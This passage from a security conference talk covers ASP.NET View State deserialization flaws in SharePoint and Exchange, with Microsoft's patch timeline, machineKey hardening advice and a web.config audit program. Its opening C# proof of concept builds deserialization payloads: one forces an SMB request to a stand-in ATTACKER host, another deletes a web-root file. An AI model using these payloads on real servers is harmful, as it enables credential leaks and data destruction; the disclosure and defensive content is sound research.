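    // Replace oldPath by newPath inside the stream. Layout: FF 01 = ObjectStateFormatter
    // version, 0x32 = "binary serialized" token, 7-bit-encoded blob length, then the
    // BinaryFormatter output in which every string is length-prefixed. Both kinds of
    // prefix are rewritten, which is why the original PoC needed equal-length paths.
    public static string RewritePath(string viewState, string oldPath, string newPath)
    {
        byte[] raw = Convert.FromBase64String(viewState);
        if (raw.Length < 4 || raw[0] != 0xFF || raw[1] != 0x01 || raw[2] != 0x32)
            throw new InvalidDataException("not an unprotected ObjectStateFormatter stream with a binary root");
        int pos = 3;
        int blobLen = Read7BitInt(raw, ref pos);
        if (blobLen != raw.Length - pos)
            throw new InvalidDataException("blob length prefix does not match");

        byte[] oldRec = LengthPrefixed(oldPath), newRec = LengthPrefixed(newPath);
        MemoryStream blob = new MemoryStream();
        int replaced = 0;
        for (int i = pos; i < raw.Length; )
        {
            if (StartsWith(raw, i, oldRec)) { blob.Write(newRec, 0, newRec.Length); i += oldRec.Length; replaced++; }
            else { blob.WriteByte(raw[i]); i++; }
        }
        // FileSystemInfo writes OriginalPath and FullPath: two string records, or one record
        // plus a back-reference when the framework hands back the same string instance for both.
        if (replaced == 0) throw new InvalidDataException("dummy path not found in stream");

        MemoryStream patched = new MemoryStream();
        patched.Write(raw, 0, 3);
        Write7BitInt(patched, (int)blob.Length);
        blob.WriteTo(patched);
        return Convert.ToBase64String(patched.ToArray());
    }

    // BinaryFormatter string body: 7-bit-encoded UTF-8 byte length, then the bytes.
    static byte[] LengthPrefixed(string s)
    {
        byte[] body = Encoding.UTF8.GetBytes(s);
        MemoryStream ms = new MemoryStream();
        Write7BitInt(ms, body.Length);
        ms.Write(body, 0, body.Length);
        return ms.ToArray();
    }

    static bool StartsWith(byte[] hay, int at, byte[] needle)
    {
        if (at + needle.Length > hay.Length) return false;
        for (int k = 0; k < needle.Length; k++) if (hay[at + k] != needle[k]) return false;
        return true;
    }

    static int Read7BitInt(byte[] b, ref int pos)
    {
        int value = 0, shift = 0; byte cur;
        do { cur = b[pos++]; value |= (cur & 0x7F) << shift; shift += 7; } while ((cur & 0x80) != 0);
        return value;
    }

    static void Write7BitInt(Stream s, int value)
    {
        while (value >= 0x80) { s.WriteByte((byte)(value | 0x80)); value >>= 7; }
        s.WriteByte((byte)value);
    }

    // The call HiddenFieldPageStatePersister.Load() makes before its cast to Pair fails;
    // NoInlining keeps the deserialized object out of the caller's frame so the GC can collect it.
    [MethodImpl(MethodImplOptions.NoInlining)]
    public static void DeserializeAndDrop(string viewState)
    {
        new LosFormatter().Deserialize(viewState);
    }

    // Local reproduction of the delete gadget against a throw-away temp file.
    public static bool DemoLocalDelete()
    {
        string victim = Path.GetTempFileName();
        DeserializeAndDrop(TempFileCollectionDeletePayload(victim));
        GC.Collect();
        GC.WaitForPendingFinalizers();    // runs ~TempFileCollection() -> File.Delete(victim)
        return !File.Exists(victim);
    }

    public static void Main()
    {
        Console.WriteLine("SMB payload:    " + FileInfoSmbPayload(@"\\ATTACKER\~test\text.txt"));
        Console.WriteLine("Delete payload: " + TempFileCollectionDeletePayload(@"C:\inetpub\wwwroot\App_Data\victim.txt"));
        Console.WriteLine("Local delete via finalizer: " + DemoLocalDelete());
    }
}
```

Compile with a Framework csc as on slide 30 (adding /r:System.Web.dll if your csc.rsp does not reference it). Only the delete payload is deserialized locally on purpose: feeding the FileInfo payload to DeserializeAndDrop would make your own machine issue the SMB request to ATTACKER, which is exactly what you want to observe on a target, not on your workstation. The deletion runs as the worker-process identity and only when the finalizer fires, so on a real server it is neither privileged nor immediate.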
• 36. Time sequence of the (patch) battle
Disclosure milestones
•26.09.2012 Initial contact with MSRC
•19.02.2013 Microsoft aims for a fix in SharePoint in May
•28.02.2013 Microsoft confirms work is under way for SkyDrive
•15.04.2013 Patch postponed (issues found during tests); MS will issue guidance about the View State MAC
•03.07.2013 Patch again postponed (issues found during tests)
•16.08.2013 Detailed answer about the next steps; BlueHat invitation
•10.09.2013 September’s patch Tuesday with MS13-067 (Vulnerabilities in Microsoft SharePoint Server Could Allow Remote Code Execution)
• 37. Time sequence of the (patch) battle
Disclosure milestones (continued)
•06.11.2013 Conference call with Microsoft
•10.12.2013 December’s patch Tuesday with
–MS13-100 (Vulnerabilities in Microsoft SharePoint Server Could Allow RCE)
–MS13-105 (Vulnerabilities in Microsoft Exchange Server Could Allow RCE)
–KB2905247 (Insecure ASP.NET Site Configuration Could Allow Elevation of Privilege)
•11.12.2013 Meeting with several Microsoft people in Seattle
• 38. Time sequence of the (patch) battle
Disclosure milestones (continued)
•05.05.2014 Release of ASP.NET 4.5.2, which forbids disabling the View State MAC
•13.05.2014 May’s patch Tuesday with MS14-022 (SharePoint)
•07.08.2014 Announcement that only the latest (ASP).NET framework will be supported from 2016 onward
•09.09.2014 Release to all customers via Windows Update of the December 2013 patch KB2905247
You are now safe…
… if you install all suggested WU patches
• 39. Time sequence of the (patch) battle
But what was the content of
•MS13-100 / CVE-2013-5059
•MS14-022 / CVE-2014-0251 (?) & CVE-2014-1813 (?)
Microsoft did their homework
•A cross-product / company-wide effort was made to address serialisation / View State issues
•Several additional attack vectors were found and fixed
• 40. Time sequence of the (patch) battle
Extract of MS13-100 (CVE-2013-5059)
•New namespace “Microsoft.Office.Server.Security”
•New internal class SafeSerialization with methods
 »IsSafeBinaryFormatterStreamWithAllowList([…])
 »[…]
 »IsSafeBinaryFormatterStreamCommon([…])
•Usage within SharePoint:
• 42. Is the ugly bug really dead?
Yes, if you patch adequately
•No pages in SharePoint should be vulnerable
•No pages in Outlook Web Access should be vulnerable
•Disabling the View State MAC should not be possible anymore with patch KB2905247 installed
This patch securing the View State is controversial
•“We deliberately broke backward compatibility to keep you safe. […] and this is something I’m horrendously proud of”
But how is the MAC computed?
•Using the keys defined in <machineKey />
• 44. Is the ugly bug really dead?
Result of an audit searching for static machineKey entries
• 45. Is the ugly bug really dead?
If I have your machineKey…
•… I can generate a valid View State MAC too
•Well, I can also generate a Forms Authentication cookie, among other things…
Issue was formally reported to Microsoft in August 2013
•Microsoft contacted the affected projects
How do you manage your machineKeys?
• 47. The (happy?) end
Ensure your products are patched / unaffected
•SharePoint (MS13-067, MS13-100 & MS14-022)
•Exchange (OWA – MS13-105)
•ASP.NET (KB2905247)
•All your other third-party ASP.NET sites
If you don’t use ASP.NET 4.5.2 yet
•Plan to support this version, as Microsoft will drop support for older versions in 2016
• 48. The (happy?) end
Verify your ASP.NET applications
•Don’t deserialize untrusted documents (e.g. on file uploads)
•Don’t re-implement custom View State-like features
Ensure you manage your machineKeys correctly
•If static keys are defined, manage them as carefully as all your other crypto material
•No copy/paste from the Internet, dedicated keys per environment, …
•Encrypt the sensitive sections of your web.config
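An added example, not from the slides and not a Compass Security tool, in the spirit of the audit on slide 44: a small C# program that walks a deployment tree for web.config files and reports the settings these last slides call out (enableViewStateMac="false", static or short machineKey values, weak validation/decryption algorithms, the same key reused in several configs, and whether the section is already encrypted). The three embedded configs and their key values are constructed placeholders, and the labels weak-app, copied-app and encrypted-app are invented for the demo.

```csharp
// Added example: audit web.config files for the View State / machineKey settings
// discussed on slides 42 to 48. Sample configs and keys are constructed placeholders.
using System;
using System.Collections.Generic;
using System.IO;
using System.Xml;

public static class MachineKeyAudit
{
    // key value -> first config it was seen in, to catch keys copied between apps or environments
    static readonly Dictionary<string, string> seenKeys = new Dictionary<string, string>(StringComparer.OrdinalIgnoreCase);

    public static List<string> Audit(string label, string configXml)
    {
        List<string> findings = new List<string>();
        XmlDocument doc = new XmlDocument();
        doc.LoadXml(configXml);

        XmlElement pages = doc.SelectSingleNode("/configuration/system.web/pages") as XmlElement;
        if (pages != null && pages.GetAttribute("enableViewStateMac").Equals("false", StringComparison.OrdinalIgnoreCase))
            findings.Add(label + ": enableViewStateMac=\"false\" (View State accepted without MAC; KB2905247 ignores the setting, remove it anyway)");

        XmlElement mk = doc.SelectSingleNode("/configuration/system.web/machineKey") as XmlElement;
        if (mk == null)
        {
            findings.Add(label + ": no <machineKey>, keys auto-generated per server (fine for one server, breaks web farms; check parent configs)");
            return findings;
        }
        if (mk.HasAttribute("configProtectionProvider"))
        {
            findings.Add(label + ": <machineKey> section is encrypted (" + mk.GetAttribute("configProtectionProvider") + "), nothing to inspect");
            return findings;
        }
        CheckKey(findings, label, mk, "validationKey", 64);   // 64-byte HMAC key as produced by the usual generators
        CheckKey(findings, label, mk, "decryptionKey", 32);   // 32-byte key for AES-256
        string validation = mk.GetAttribute("validation");
        if (validation == "MD5" || validation == "SHA1")
            findings.Add(label + ": validation=\"" + validation + "\", use HMACSHA256 or stronger");
        string decryption = mk.GetAttribute("decryption");
        if (decryption == "3DES" || decryption == "DES")
            findings.Add(label + ": decryption=\"" + decryption + "\", use AES");
        return findings;
    }

    static void CheckKey(List<string> findings, string label, XmlElement mk, string attr, int recommendedBytes)
    {
        string value = mk.GetAttribute(attr);
        if (value.Length == 0 || value.StartsWith("AutoGenerate", StringComparison.OrdinalIgnoreCase)) return;
        string note = label + ": static " + attr + " of " + value.Length / 2 + " bytes";
        if (value.Length / 2 < recommendedBytes) note += " (shorter than the recommended " + recommendedBytes + ")";
        findings.Add(note);
        string firstSeen;
        if (seenKeys.TryGetValue(value, out firstSeen))
            findings.Add(label + ": " + attr + " is identical to the one in " + firstSeen + " (copy/paste or shared across environments)");
        else
            seenKeys[value] = label;
    }

    // Walk a deployment tree. Each file is judged on its own, so a key inherited from
    // machine.config or a parent web.config is reported as "no <machineKey>".
    public static List<string> AuditTree(string root)
    {
        List<string> all = new List<string>();
        foreach (string file in Directory.GetFiles(root, "web.config", SearchOption.AllDirectories))
            all.AddRange(Audit(file, File.ReadAllText(file)));
        return all;
    }

    // Constructed sample configs with placeholder keys (never use these values)
    static readonly string ValKey = "0123456789ABCDEF0123456789ABCDEF01234567";           // 20 bytes
    static readonly string DecKey = "FEDCBA9876543210FEDCBA9876543210FEDCBA9876543210";   // 24 bytes
    public static readonly string WeakConfig =
        "<configuration><system.web><pages enableViewStateMac=\"false\" />" +
        "<machineKey validationKey=\"" + ValKey + "\" decryptionKey=\"" + DecKey + "\" validation=\"SHA1\" decryption=\"3DES\" />" +
        "</system.web></configuration>";
    public static readonly string CopiedConfig =
        "<configuration><system.web><machineKey validationKey=\"" + ValKey + "\" decryptionKey=\"" + DecKey + "\" validation=\"HMACSHA256\" decryption=\"AES\" />" +
        "</system.web></configuration>";
    public static readonly string EncryptedConfig =
        "<configuration><system.web><machineKey configProtectionProvider=\"RsaProtectedConfigurationProvider\"><EncryptedData /></machineKey></system.web></configuration>";

    public static void Main(string[] args)
    {
        List<string> findings = new List<string>();
        if (args.Length > 0) findings = AuditTree(args[0]);
        else
        {
            findings.AddRange(Audit("weak-app/web.config", WeakConfig));
            findings.AddRange(Audit("copied-app/web.config", CopiedConfig));
            findings.AddRange(Audit("encrypted-app/web.config", EncryptedConfig));
        }
        foreach (string f in findings) Console.WriteLine(f);
    }
}
```

Run it without arguments to see the findings on the constructed samples (the copied-app config is flagged because it reuses the keys of weak-app), or pass the root of an IIS deployment to audit real files. The encryption the last bullet asks for is done per section with the Framework’s own tool, e.g. aspnet_regiis.exe -pe "system.web/machineKey" -app "/YourApp", after which the audit reports the section as encrypted instead of printing key material.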
• 50. Merci/Thank you!
Contact: alexandre.herzog@csnc.ch
Blog http://blog.csnc.ch/
LinkedIn http://ch.linkedin.com/in/alexandreherzog/
G+ https://plus.google.com/u/1/109572456864701444940/
Slides: http://slideshare.net/ASF-WS/presentations
http://appsec-forum.ch
• 51. References
Understanding ASP.NET View State
http://msdn.microsoft.com/en-us/library/ms972976.aspx
Beware of Serialized GUI Objects Bearing Data
https://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC-2010-Byrne-SGUI-slides.pdf
OWASP - PHP Object Injection
https://www.owasp.org/index.php/PHP_Object_Injection
Are you my Type?
https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf
Barry Dorrans - Going beyond OWASP (esp. 36:40 to 46:45)
http://vimeo.com/108438465
Moving to the .NET Framework 4.5.2
http://blogs.msdn.com/b/dotnet/archive/2014/08/07/moving-to-the-net-framework-4-5-2.aspx
Farewell, EnableViewStateMac!
http://blogs.msdn.com/b/webdev/archive/2014/09/09/farewell-enableviewstatemac.aspx